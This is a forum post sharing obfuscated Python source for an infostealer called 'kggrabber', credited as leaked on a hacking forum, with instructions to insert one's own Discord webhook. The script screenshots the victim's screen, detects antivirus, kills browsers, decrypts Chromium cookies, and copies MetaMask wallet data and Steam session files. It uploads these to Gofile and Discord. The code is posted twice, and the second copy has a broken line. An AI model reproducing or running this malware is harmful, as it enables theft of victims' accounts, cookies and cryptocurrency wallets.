08-22-2024, 07:58 AM
i had to edit this shit with py idle it was a pain in the ass
in the e variable u put ur webhook
import os
eq=open
eO=Exception
eN=print
ef=set
ei=False
eY=None
en=int
el=os.getenv
eb=os.environ
eE=os.rmdir
et=os.walk
ey=os.makedirs
eD=os.system
ek=os.listdir
eC=os.remove
eg=os.path
import requests
eo=requests.post
eh=requests.get
import json
ev=json.load
from PIL import ImageGrab
import zipfile
eM=zipfile.ZIP_DEFLATED
eQ=zipfile.ZipFile
from discord_webhook import DiscordWebhook,DiscordEmbed
import sqlite3
eL=sqlite3.connect
import shutil
ew=shutil.copy2
import base64
em=base64.b64decode
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
H=eg.expanduser("~")
e="put discord webhook here"
def Hz():
V=ImageGrab.grab()
R=eg.join(H,"AppData\\Local\\Temp\\ss.png")
V.save(R)
S=DiscordWebhook(url=e)
K=DiscordEmbed(title="Screenshot and antivirus detection",description="Latest screenshot capture and the antivirus is located at {foldern}",color=242424)
K.set_author(name="kggrabber",icon_url="")
K.set_image(url="")
K.set_footer(text="leaked by stackunderflow on breachforums")
S.add_embed(K)
S.execute()
S=DiscordWebhook(url=e)
with eq(R,"rb")as O00OO0OOOOOOOOO00:
S.add_file(file=O00OO0OOOOOOOOO00.read(),filename='ss.png')
S.execute()
try:
eC(R)
except eO as O0000O00OOOO000O0:
eN()
def Hj(O00O00OO00OOOO0O0):
W=["Avast","AVG","Bitdefender","Kaspersky","McAfee","Norton",'''SophosESET''',"Malwarebytes","Avira","Panda","Trend Micro","F-Secure","McAfee","Comodo","Avira","BullGuard","360 Total Security","Ad-Aware","Dr.Web","G-Data","Vipre","ClamWin","ZoneAlarm","Cylance","Webroot","Cylance","Palo Alto Networks","Symantec","SentinelOne","CrowdStrike","Emsisoft","HitmanPro","Fortinet","Trend Micro","Emsisoft","FireEye","Cylance","ESET","Zemana","McAfee","Windows Defender"]
c={}
u=ef()
for J in ek(O00O00OO00OOOO0O0):
p=eg.join(O00O00OO00OOOO0O0,J)
if eg.isdir(p):
for s in W:
if s.lower()in J.lower():
c[s]=J
return c
return u
U=Hj("C:\\Program Files")
if U:
for g,folder_name in U.items():
Hz()
C=DiscordWebhook(url=e)
k=DiscordEmbed(title="Screenshot and antivirus detection",description=f"{g}: {folder_name}",color=242424)
k.set_author(name="kggrabber",icon_url="")
k.set_image(url="")
k.set_footer(text="leaked by stackunderflow on breachforums")
C.add_embed(k)
C.execute()
H=eg.expanduser("~")
def Ha():
D=["chrome.exe","msedge.exe","firefox.exe","opera.exe","brave.exe"]
for y in D:
eD(f"taskkill /F /IM {y} /T")
def HI():
t=eh("https://api.gofile.io/getServer")
E=t.json()
if E['status']=='ok':
return E['data']['server']
else:
raise eO("Failed to get a server from Gofile.")
def HX(O0O00O00000000000,OOO0OO0OOO00O00O0):
b=f"https://{OOO0OO0OOO00O00O0}.gofile.io/uploadFile"
with eq(O0O00O00000000000,'rb')as OOOOO00OOOO000O00:
l={'file'
eg.basename(O0O00O00000000000),OOOOO00OOOO000O00)}
h=eo(b,files=l)
o=h.json()
if o['status']=='ok':
return o['data']['downloadPage']
else:
raise eO("Failed to upload file to Gofile.")
def eH(OO00OOO0O0O0OOO0O,OO0O0OO0OOO0O0O00):
if not eg.exists(OO0O0OO0OOO0O0O00):
ey(OO0O0OO0OOO0O0O00)
for v in ek(OO00OOO0O0O0OOO0O):
Q=eg.join(OO00OOO0O0O0OOO0O,v)
M=eg.join(OO0O0OO0OOO0O0O00,v)
if eg.isdir(Q):
eH(Q,M)
else:
with eq(Q,'rb')as O00OOOOO0000OOO0O,eq(M,'wb')as L:
L.write(O00OOOOO0000OOO0O.read())
def eV(O00O0OO00O00O0OOO,O0OOO0O0OOO00O0O0):
Ha()
w=eg.join(H,f"AppData\\Local\\Temp\\Metamask_{O0OOO0O0OOO00O0O0}")
m=w+".zip"
if eg.exists(O00O0OO00O00O0OOO):
eH(O00O0OO00O00O0OOO,w)
with eQ(m,'w')as N:
for q,O0O0OO0O0000000OO,OO0OOOO0O0OOO00O0 in et(w):
for O in OO0OOOO0O0OOO00O0:
N.write(eg.join(q,O),eg.relpath(eg.join(q,O),start=w))
f=HI()
i=HX(m,f)
Y=DiscordWebhook(url=e)
n=DiscordEmbed(title="MetaMask Data Backup",description=f"leaked by stackunderflow on breachforums{O0OOO0O0OOO00O0O0}.",color=242424)
n.add_embed_field(name="Download Link",value=i,inline=ei)
Y.add_embed(n)
Y.execute()
eC(m)
for q,O0O0OO0O0000000OO,OO0OOOO0O0OOO00O0 in et(w,topdown=ei):
for A in OO0OOOO0O0OOO00O0:
eC(eg.join(q,A))
for A in O0O0OO0O0000000OO:
eE(eg.join(q,A))
eE(w)
def eR():
G=[[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm"),"Edge"],[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Edge"],[eg.join(H,"AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Brave"],[eg.join(H,"AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Google"],[eg.join(H,"AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"OperaGX"]]
for T,OO0O0OOOOOOOOOOOO in G:
eV(T,OO0O0OOOOOOOOOOOO)
eR()
def eS(OOO00O0O0O00OO0O0):
r=eD(f"taskkill /F /IM {OOO00O0O0O00OO0O0}")
if r==0:
eN()
else:
eN()
def eK():
eS("Steam.exe")
F=eb.get("PROGRAMFILES(X86)","")+"\\Steam"
if eg.exists(F):
P=[eg.join(F,O00OO000OO0OOOO00)for O00OO000OO0OOOO00 in ek(F)if O00OO000OO0OOOO00.startswith("ssfn")]
B=eg.join(F,"config")
x=eg.join(eb['TEMP'],"steam_session.zip")
with eQ(x,'w',eM)as j:
if eg.exists(B):
for d,OO0OOO00OO0OOOO00,O0O00OO00O0OO000O in et(B):
for z in O0O00OO00O0OO000O:
j.write(eg.join(d,z),eg.relpath(eg.join(d,z),F))
for a in P:
j.write(a,eg.basename(a))
I=DiscordWebhook(url=e)
X=DiscordEmbed(title="Steam Data Backup",description="Latest backup of the Steam session data.",color=242424)
X.set_author(name="leaked by stackunderflow",icon_url="")
X.set_image(url="")
X.set_footer(text="leaked by stackunderflow on bf")
I.add_embed(X)
I.execute()
I=DiscordWebhook(url=e)
with eq(x,'rb')as OOOO0OOO00O00OOOO:
I.add_file(file=OOOO0OOO00O00OOOO.read(),filename='steam_session.zip')
I.execute()
eC(x)
eK()
He=el('LOCALAPPDATA')
def eW():
HV=["chrome.exe","msedge.exe","firefox.exe","opera.exe","iexplore.exe","brave.exe","vivaldi.exe"]
for HR in HV:
HS=f"taskkill /F /IM {HR}"
HK=eD(HS)
if HK==0:
eN()
else:
eN()
def ec(OOO0O00O000OOOOO0):
HW=eg.join(OOO0O00O000OOOOO0,"Local State")
if not eg.exists(HW):
eN()
return eY
try:
with eq(HW,"r",encoding="utf-8")as O0O0OOO0OO00OO00O:
Hc=ev(O0O0OOO0OO00OO00O)
Hu=em(Hc["os_crypt"]["encrypted_key"])
HJ=CryptUnprotectData(Hu[5:],eY,eY,eY,0)[1]
return HJ
except eO as OOO000000O000OOO0:
eN()
return eY
def eu(Hp,O00000000O0OOOO0O):
try:
if Hp[:3]==b'v10'or Hp[:3]==b'v11':
Hp=Hp[3:]
Hs=Hp[:12]
Hp=Hp[12:]
HU=AES.new(O00000000O0OOOO0O,AES.MODE_GCM,Hs)
Hg=HU.decrypt(Hp[:-16])
return Hg.decode('utf-8')
except eO as OO00OOO0O0OO000OO:
eN()
return ""
def eJ(O0O00O00O000O0O00,OOO00OO00000OOOOO):
HC=eg.join(O0O00O00O000O0O00,'Default','Network','Cookies')
if not eg.exists(HC):
eN()
return[]
Hk=eg.join(O0O00O00O000O0O00,'temp_cookies.sqlite')
ew(HC,Hk)
HD=eL(Hk)
Hy=HD.cursor()
Ht=[]
Hy.execute('SELECT host_key, name, path, is_secure, expires_utc, encrypted_value FROM cookies')
for HE in Hy.fetchall():
Hb,OOOOOO0O00OOO0O0O,O000000O0OOO0OOOO,O0OOO0OO00O0OO00O,Ho,OO0O0O0O00OOOO0OO=HE
Hl=eu(OO0O0O0O00OOOO0OO,OOO00OO00000OOOOO)
Hh='TRUE'if O0OOO0OO00O0OO00O else 'FALSE'
Ho=en(Ho/1000000-11644473600)if Ho else 0
Hv=f"{Hb}\tFALSE\t{O000000O0OOO0OOOO}\t{Hh}\t{Ho}\t{OOOOOO0O00OOO0O0O}\t{Hl}\n"
Ht.append(Hv)
Hy.close()
HD.close()
eC(Hk)
return Ht
def ep(OOOO0OO0O0OOO00OO,OOO0OO0O0O0O0O000,O00OO00000000OOO0):
HQ=eg.join(OOO0OO0O0O0O0O000,f'{O00OO00000000OOO0}_cookies.txt')
with eq(HQ,'w',encoding='utf-8')as HL:
for HM in OOOO0OO0O0OOO00OO:
HL.write(HM)
def es():
eW()
Hw=el('LOCALAPPDATA')
Hm=eg.join(Hw,'sc')
if not eg.exists(Hm):
ey(Hm)
Hw=el('LOCALAPPDATA')
Hq={'amigo':Hw+'\\Amigo\\User Data','torch':Hw+'\\Torch\\User Data','kometa':Hw+'\\Kometa\\User Data','orbitum':Hw+'\\Orbitum\\User Data','cent-browser':Hw+'\\CentBrowser\\User Data','7star':Hw+'\\7Star\\7Star\\User Data','sputnik':Hw+'\\Sputnik\\Sputnik\\User Data','vivaldi':Hw+'\\Vivaldi\\User Data','google-chrome-sxs':Hw+'\\Google\\Chrome SxS\\User Data','google-chrome':Hw+'\\Google\\Chrome\\User Data','epic-privacy-browser':Hw+'\\Epic Privacy Browser\\User Data','microsoft-edge':Hw+'\\Microsoft\\Edge\\User Data','uran':Hw+'\\uCozMedia\\Uran\\User Data','yandex':Hw+'\\Yandex\\YandexBrowser\\User Data','brave':Hw+'\\BraveSoftware\\Brave-Browser\\User Data','iridium':Hw+'\\Iridium\\User Data'}
for HO,OO0O0OO0O0OO0OO00 in Hq.items():
eN()
HN=ec(OO0O0OO0O0OO0OO00)
if HN:
eN()
Hf=eJ(OO0O0OO0O0OO0OO00,HN)
ep(Hf,Hm,HO)
else:
eN()
if __name__=="__main__":
es()
def eU(OO0000OOO00OOOO0O,O0000O0000OOO0O0O):
Ha()
Hi=eg.join(H,f"AppData\\Local\\sc")
HY=Hi+".zip"
if eg.exists(OO0000OOO00OOOO0O):
eH(OO0000OOO00OOOO0O,Hi)
with eQ(HY,'w')as HG:
for Hn,OO0OOOO00OOO0OOOO,O0OO0O00O00000OO0 in et(Hi):
for HA in O0OO0O00O00000OO0:
HG.write(eg.join(Hn,HA),eg.relpath(eg.join(Hn,HA),start=Hi))
HT=HI()
Hr=HX(HY,HT)
HF=DiscordWebhook(url=e)
HP=DiscordEmbed(title="cookies",description=f"leaked by stackunderflow on breachforums{O0000O0000OOO0O0O}.",color=242424)
HP.add_embed_field(name="Download Link",value=Hr,inline=ei)
HF.add_embed(HP)
HF.execute()
eC(HY)
for Hn,OO0OOOO00OOO0OOOO,O0OO0O00O00000OO0 in et(Hi,topdown=ei):
for HB in O0OO0O00O00000OO0:
eC(eg.join(Hn,HB))
for HB in OO0OOOO00OOO0OOOO:
eE(eg.join(Hn,HB))
eE(Hi)
def eR():
Hx=[[eg.join(H,"AppData\\Local\\sc"),"Edge"],[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Edge"],[eg.join(H,"AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Brave"],[eg.join(H,"AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Google"],[eg.join(H,"AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"OperaGX"]]
for Hd,O0O0O00OO00O00O00 in Hx:
eU(Hd,O0O0O00OO00O00O00)
eR()
in the e variable u put ur webhook
import os
eq=open
eO=Exception
eN=print
ef=set
ei=False
eY=None
en=int
el=os.getenv
eb=os.environ
eE=os.rmdir
et=os.walk
ey=os.makedirs
eD=os.system
ek=os.listdir
eC=os.remove
eg=os.path
import requests
eo=requests.post
eh=requests.get
import json
ev=json.load
from PIL import ImageGrab
import zipfile
eM=zipfile.ZIP_DEFLATED
eQ=zipfile.ZipFile
from discord_webhook import DiscordWebhook,DiscordEmbed
import sqlite3
eL=sqlite3.connect
import shutil
ew=shutil.copy2
import base64
em=base64.b64decode
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
H=eg.expanduser("~")
e="put discord webhook here"
def Hz():
V=ImageGrab.grab()
R=eg.join(H,"AppData\\Local\\Temp\\ss.png")
V.save(R)
S=DiscordWebhook(url=e)
K=DiscordEmbed(title="Screenshot and antivirus detection",description="Latest screenshot capture and the antivirus is located at {foldern}",color=242424)
K.set_author(name="kggrabber",icon_url="")
K.set_image(url="")
K.set_footer(text="leaked by stackunderflow on breachforums")
S.add_embed(K)
S.execute()
S=DiscordWebhook(url=e)
with eq(R,"rb")as O00OO0OOOOOOOOO00:
S.add_file(file=O00OO0OOOOOOOOO00.read(),filename='ss.png')
S.execute()
try:
eC(R)
except eO as O0000O00OOOO000O0:
eN()
def Hj(O00O00OO00OOOO0O0):
W=["Avast","AVG","Bitdefender","Kaspersky","McAfee","Norton",'''SophosESET''',"Malwarebytes","Avira","Panda","Trend Micro","F-Secure","McAfee","Comodo","Avira","BullGuard","360 Total Security","Ad-Aware","Dr.Web","G-Data","Vipre","ClamWin","ZoneAlarm","Cylance","Webroot","Cylance","Palo Alto Networks","Symantec","SentinelOne","CrowdStrike","Emsisoft","HitmanPro","Fortinet","Trend Micro","Emsisoft","FireEye","Cylance","ESET","Zemana","McAfee","Windows Defender"]
c={}
u=ef()
for J in ek(O00O00OO00OOOO0O0):
p=eg.join(O00O00OO00OOOO0O0,J)
if eg.isdir(p):
for s in W:
if s.lower()in J.lower():
c[s]=J
return c
return u
U=Hj("C:\\Program Files")
if U:
for g,folder_name in U.items():
Hz()
C=DiscordWebhook(url=e)
k=DiscordEmbed(title="Screenshot and antivirus detection",description=f"{g}: {folder_name}",color=242424)
k.set_author(name="kggrabber",icon_url="")
k.set_image(url="")
k.set_footer(text="leaked by stackunderflow on breachforums")
C.add_embed(k)
C.execute()
H=eg.expanduser("~")
def Ha():
D=["chrome.exe","msedge.exe","firefox.exe","opera.exe","brave.exe"]
for y in D:
eD(f"taskkill /F /IM {y} /T")
def HI():
t=eh("https://api.gofile.io/getServer")
E=t.json()
if E['status']=='ok':
return E['data']['server']
else:
raise eO("Failed to get a server from Gofile.")
def HX(O0O00O00000000000,OOO0OO0OOO00O00O0):
b=f"https://{OOO0OO0OOO00O00O0}.gofile.io/uploadFile"
with eq(O0O00O00000000000,'rb')as OOOOO00OOOO000O00:
l={'file'

h=eo(b,files=l)
o=h.json()
if o['status']=='ok':
return o['data']['downloadPage']
else:
raise eO("Failed to upload file to Gofile.")
def eH(OO00OOO0O0O0OOO0O,OO0O0OO0OOO0O0O00):
if not eg.exists(OO0O0OO0OOO0O0O00):
ey(OO0O0OO0OOO0O0O00)
for v in ek(OO00OOO0O0O0OOO0O):
Q=eg.join(OO00OOO0O0O0OOO0O,v)
M=eg.join(OO0O0OO0OOO0O0O00,v)
if eg.isdir(Q):
eH(Q,M)
else:
with eq(Q,'rb')as O00OOOOO0000OOO0O,eq(M,'wb')as L:
L.write(O00OOOOO0000OOO0O.read())
def eV(O00O0OO00O00O0OOO,O0OOO0O0OOO00O0O0):
Ha()
w=eg.join(H,f"AppData\\Local\\Temp\\Metamask_{O0OOO0O0OOO00O0O0}")
m=w+".zip"
if eg.exists(O00O0OO00O00O0OOO):
eH(O00O0OO00O00O0OOO,w)
with eQ(m,'w')as N:
for q,O0O0OO0O0000000OO,OO0OOOO0O0OOO00O0 in et(w):
for O in OO0OOOO0O0OOO00O0:
N.write(eg.join(q,O),eg.relpath(eg.join(q,O),start=w))
f=HI()
i=HX(m,f)
Y=DiscordWebhook(url=e)
n=DiscordEmbed(title="MetaMask Data Backup",description=f"leaked by stackunderflow on breachforums{O0OOO0O0OOO00O0O0}.",color=242424)
n.add_embed_field(name="Download Link",value=i,inline=ei)
Y.add_embed(n)
Y.execute()
eC(m)
for q,O0O0OO0O0000000OO,OO0OOOO0O0OOO00O0 in et(w,topdown=ei):
for A in OO0OOOO0O0OOO00O0:
eC(eg.join(q,A))
for A in O0O0OO0O0000000OO:
eE(eg.join(q,A))
eE(w)
def eR():
G=[[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm"),"Edge"],[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Edge"],[eg.join(H,"AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Brave"],[eg.join(H,"AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Google"],[eg.join(H,"AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"OperaGX"]]
for T,OO0O0OOOOOOOOOOOO in G:
eV(T,OO0O0OOOOOOOOOOOO)
eR()
def eS(OOO00O0O0O00OO0O0):
r=eD(f"taskkill /F /IM {OOO00O0O0O00OO0O0}")
if r==0:
eN()
else:
eN()
def eK():
eS("Steam.exe")
F=eb.get("PROGRAMFILES(X86)","")+"\\Steam"
if eg.exists(F):
P=[eg.join(F,O00OO000OO0OOOO00)for O00OO000OO0OOOO00 in ek(F)if O00OO000OO0OOOO00.startswith("ssfn")]
B=eg.join(F,"config")
x=eg.join(eb['TEMP'],"steam_session.zip")
with eQ(x,'w',eM)as j:
if eg.exists(B):
for d,OO0OOO00OO0OOOO00,O0O00OO00O0OO000O in et(B):
for z in O0O00OO00O0OO000O:
j.write(eg.join(d,z),eg.relpath(eg.join(d,z),F))
for a in P:
j.write(a,eg.basename(a))
I=DiscordWebhook(url=e)
X=DiscordEmbed(title="Steam Data Backup",description="Latest backup of the Steam session data.",color=242424)
X.set_author(name="leaked by stackunderflow",icon_url="")
X.set_image(url="")
X.set_footer(text="leaked by stackunderflow on bf")
I.add_embed(X)
I.execute()
I=DiscordWebhook(url=e)
with eq(x,'rb')as OOOO0OOO00O00OOOO:
I.add_file(file=OOOO0OOO00O00OOOO.read(),filename='steam_session.zip')
I.execute()
eC(x)
eK()
He=el('LOCALAPPDATA')
def eW():
HV=["chrome.exe","msedge.exe","firefox.exe","opera.exe","iexplore.exe","brave.exe","vivaldi.exe"]
for HR in HV:
HS=f"taskkill /F /IM {HR}"
HK=eD(HS)
if HK==0:
eN()
else:
eN()
def ec(OOO0O00O000OOOOO0):
HW=eg.join(OOO0O00O000OOOOO0,"Local State")
if not eg.exists(HW):
eN()
return eY
try:
with eq(HW,"r",encoding="utf-8")as O0O0OOO0OO00OO00O:
Hc=ev(O0O0OOO0OO00OO00O)
Hu=em(Hc["os_crypt"]["encrypted_key"])
HJ=CryptUnprotectData(Hu[5:],eY,eY,eY,0)[1]
return HJ
except eO as OOO000000O000OOO0:
eN()
return eY
def eu(Hp,O00000000O0OOOO0O):
try:
if Hp[:3]==b'v10'or Hp[:3]==b'v11':
Hp=Hp[3:]
Hs=Hp[:12]
Hp=Hp[12:]
HU=AES.new(O00000000O0OOOO0O,AES.MODE_GCM,Hs)
Hg=HU.decrypt(Hp[:-16])
return Hg.decode('utf-8')
except eO as OO00OOO0O0OO000OO:
eN()
return ""
def eJ(O0O00O00O000O0O00,OOO00OO00000OOOOO):
HC=eg.join(O0O00O00O000O0O00,'Default','Network','Cookies')
if not eg.exists(HC):
eN()
return[]
Hk=eg.join(O0O00O00O000O0O00,'temp_cookies.sqlite')
ew(HC,Hk)
HD=eL(Hk)
Hy=HD.cursor()
Ht=[]
Hy.execute('SELECT host_key, name, path, is_secure, expires_utc, encrypted_value FROM cookies')
for HE in Hy.fetchall():
Hb,OOOOOO0O00OOO0O0O,O000000O0OOO0OOOO,O0OOO0OO00O0OO00O,Ho,OO0O0O0O00OOOO0OO=HE
Hl=eu(OO0O0O0O00OOOO0OO,OOO00OO00000OOOOO)
Hh='TRUE'if O0OOO0OO00O0OO00O else 'FALSE'
Ho=en(Ho/1000000-11644473600)if Ho else 0
Hv=f"{Hb}\tFALSE\t{O000000O0OOO0OOOO}\t{Hh}\t{Ho}\t{OOOOOO0O00OOO0O0O}\t{Hl}\n"
Ht.append(Hv)
Hy.close()
HD.close()
eC(Hk)
return Ht
def ep(OOOO0OO0O0OOO00OO,OOO0OO0O0O0O0O000,O00OO00000000OOO0):
HQ=eg.join(OOO0OO0O0O0O0O000,f'{O00OO00000000OOO0}_cookies.txt')
with eq(HQ,'w',encoding='utf-8')as HL:
for HM in OOOO0OO0O0OOO00OO:
HL.write(HM)
def es():
eW()
Hw=el('LOCALAPPDATA')
Hm=eg.join(Hw,'sc')
if not eg.exists(Hm):
ey(Hm)
Hw=el('LOCALAPPDATA')
Hq={'amigo':Hw+'\\Amigo\\User Data','torch':Hw+'\\Torch\\User Data','kometa':Hw+'\\Kometa\\User Data','orbitum':Hw+'\\Orbitum\\User Data','cent-browser':Hw+'\\CentBrowser\\User Data','7star':Hw+'\\7Star\\7Star\\User Data','sputnik':Hw+'\\Sputnik\\Sputnik\\User Data','vivaldi':Hw+'\\Vivaldi\\User Data','google-chrome-sxs':Hw+'\\Google\\Chrome SxS\\User Data','google-chrome':Hw+'\\Google\\Chrome\\User Data','epic-privacy-browser':Hw+'\\Epic Privacy Browser\\User Data','microsoft-edge':Hw+'\\Microsoft\\Edge\\User Data','uran':Hw+'\\uCozMedia\\Uran\\User Data','yandex':Hw+'\\Yandex\\YandexBrowser\\User Data','brave':Hw+'\\BraveSoftware\\Brave-Browser\\User Data','iridium':Hw+'\\Iridium\\User Data'}
for HO,OO0O0OO0O0OO0OO00 in Hq.items():
eN()
HN=ec(OO0O0OO0O0OO0OO00)
if HN:
eN()
Hf=eJ(OO0O0OO0O0OO0OO00,HN)
ep(Hf,Hm,HO)
else:
eN()
if __name__=="__main__":
es()
def eU(OO0000OOO00OOOO0O,O0000O0000OOO0O0O):
Ha()
Hi=eg.join(H,f"AppData\\Local\\sc")
HY=Hi+".zip"
if eg.exists(OO0000OOO00OOOO0O):
eH(OO0000OOO00OOOO0O,Hi)
with eQ(HY,'w')as HG:
for Hn,OO0OOOO00OOO0OOOO,O0OO0O00O00000OO0 in et(Hi):
for HA in O0OO0O00O00000OO0:
HG.write(eg.join(Hn,HA),eg.relpath(eg.join(Hn,HA),start=Hi))
HT=HI()
Hr=HX(HY,HT)
HF=DiscordWebhook(url=e)
HP=DiscordEmbed(title="cookies",description=f"leaked by stackunderflow on breachforums{O0000O0000OOO0O0O}.",color=242424)
HP.add_embed_field(name="Download Link",value=Hr,inline=ei)
HF.add_embed(HP)
HF.execute()
eC(HY)
for Hn,OO0OOOO00OOO0OOOO,O0OO0O00O00000OO0 in et(Hi,topdown=ei):
for HB in O0OO0O00O00000OO0:
eC(eg.join(Hn,HB))
for HB in OO0OOOO00OOO0OOOO:
eE(eg.join(Hn,HB))
eE(Hi)
def eR():
Hx=[[eg.join(H,"AppData\\Local\\sc"),"Edge"],[eg.join(H,"AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Edge"],[eg.join(H,"AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Brave"],[eg.join(H,"AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"Google"],[eg.join(H,"AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"),"OperaGX"]]
for Hd,O0O0O00OO00O00O00 in Hx:
eU(Hd,O0O0O00OO00O00O00)
eR()